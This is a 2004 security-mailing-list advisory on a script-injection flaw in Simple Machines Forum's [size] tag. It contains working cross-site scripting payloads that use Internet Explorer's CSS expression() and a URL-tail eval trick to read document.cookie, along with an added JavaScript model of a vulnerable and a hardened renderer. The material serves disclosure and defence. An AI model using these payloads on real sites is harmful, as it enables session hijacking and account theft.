Date: 5 May 2004 12:28:00 -0000
From: Cheng Peng Su <apple_soup@....com>
To: bugtraq@...urityfocus.com
Subject: SMF SIZE Tag Script Injection Vulnerability

############################################################################

  Advisory Name : SMF SIZE Tag Script Injection Vulnerability
   Release Date : May 3, 2004
    Application : Simple Machines Forum (SMF)
      Tested On : SMF 1.0 Beta 5 Public
     Vendor URL : http://www.simplemachines.org/
     Discoverer : Cheng Peng Su (apple_soup_at_msn.com)
     
############################################################################

 Intro:
       The team that brought you YaBB SE has moved on to develop
  the next evolution in forum software, Simple Machines Forum (SMF),
  and has rebranded itself under the name Simple Machines. They say
  proudly that "SMF is a next-generation community software package
  and is jam-packed with features, while at the same time having a minimal
  impact on resources."
   
 Proof of concept:
       SMF does not strictly filter the value of the [size] tag: some
  characters are stripped, but "(", ")" and "+" are left in place, and the
  value is emitted into the font-size property of the rendered post.
  Internet Explorer evaluates the CSS expression() syntax as script, so an
  attacker can attach a malicious expression to the font-size attribute.
  The following tag works as posted:

     [size=expression(alert(document.cookie))]Just beginning[/size]

  More complex code runs into the characters SMF does filter (quote,
  apostrophe and semicolon), but I found a working way that needs no
  quote, apostrophe or semicolon; it is shown in the Exploit below.
  
 Exploit:
       First, submit content like the following:

  [size=expression(eval(unescape(document.URL.substring(document.URL.length-41,document.URL.length))))]Big Exploit[/size]

  The '41' is the length of the malicious script as it appears in
  document.URL. The script is read from the end of the page's own URL,
  so none of the filtered characters has to pass through SMF. If the URL
  of the topic above is

  http://site/index.php?topic=12345.0

  make a link that carries the script after it, like this:

  http://site/index.php?topic=12345.0&alert('Your cookie:\n'+document.cookie)

  The script itself is 39 characters; the space in 'Your cookie:' is sent
  as %20 in the URL, which gives 41, and unescape() turns it back into a
  space before eval() runs it.
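The following is an added example, not the advisory's or SMF's own code. It models the [size] tag handling the advisory describes (a renderer that strips quotes, apostrophes and semicolons but lets parentheses and "+" through, next to a hardened renderer that whitelists a numeric size) and the document.URL trick from the Exploit section. The exact filtering SMF applied and the browser's encoding of the space as %20 are assumptions reconstructed from the text above.

```javascript
// Added example, not SMF's own code. Toy model of the [size] BBCode handling
// the advisory describes (vulnerable and hardened) plus the document.URL
// trick from the Exploit section. The exact filter SMF applied and the
// browser's URL encoding are assumptions reconstructed from the advisory.

// Escape text content so only the tag value is under discussion.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

const SIZE_TAG = /\[size=([^\]]*)\]([\s\S]*?)\[\/size\]/gi;

// Vulnerable renderer (assumed behaviour): strips " ' and ; from the value,
// lets ( ) + and letters through, and drops the result into font-size,
// where Internet Explorer evaluates expression(...) as script.
function renderSizeVulnerable(bbcode) {
  return bbcode.replace(SIZE_TAG, (whole, value, text) => {
    const filtered = value.replace(/["';]/g, '');
    return '<font style="font-size: ' + filtered + ';">' + escapeHtml(text) + '</font>';
  });
}

// Hardened renderer: accept only a small integer with an optional pt/px unit.
// Any other value is never interpreted; the tag is emitted as escaped text.
function renderSizeHardened(bbcode) {
  return bbcode.replace(SIZE_TAG, (whole, value, text) => {
    const m = /^(\d{1,2})(pt|px)?$/.exec(value.trim());
    if (!m || Number(m[1]) < 1 || Number(m[1]) > 36) {
      return escapeHtml(whole);
    }
    return '<font style="font-size: ' + m[1] + (m[2] || 'pt') + ';">' + escapeHtml(text) + '</font>';
  });
}

// The exploit reads its script from the tail of document.URL so that none of
// the filtered characters has to pass through SMF. Modelling assumption: the
// browser leaves ' ( ) + and \ alone but sends the space as %20, which is why
// a 39-character payload occupies 41 characters of the URL.
function buildAttackUrl(topicUrl, payload) {
  return topicUrl + '&' + payload.replace(/ /g, '%20');
}

function encodedLength(payload) {
  return payload.replace(/ /g, '%20').length;
}

// Mirrors document.URL.substring(document.URL.length - n, document.URL.length)
// followed by unescape(), which turns %20 back into the space eval() needs.
function tailScript(url, n) {
  return unescape(url.substring(url.length - n, url.length));
}

function demo() {
  // Constructed sample: the advisory's link, with \n kept literal as in the URL.
  const payload = "alert('Your cookie:\\n'+document.cookie)";
  const url = buildAttackUrl('http://site/index.php?topic=12345.0', payload);
  const n = encodedLength(payload);
  return { payloadLength: payload.length, tailLength: n, recovered: tailScript(url, n) };
}

console.log(demo());
```

The hardened renderer shows the fix a practitioner would actually ship: validate the attribute value against a whitelist instead of blacklisting individual characters, since any blacklist that leaves "(" and "+" through still lets expression() reach the style attribute.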
 
 Solution:
       SMF has been notified, and a fix or update may be released to
  resolve this issue. Who knows, maybe they don't care about this bug.

 Contact:
  apple_soup_at_msn.com
  Cheng Peng Su
  Class 1,Senior 2, High school attached to Wuhan University
  Wuhan,Hubei,China(430072)
  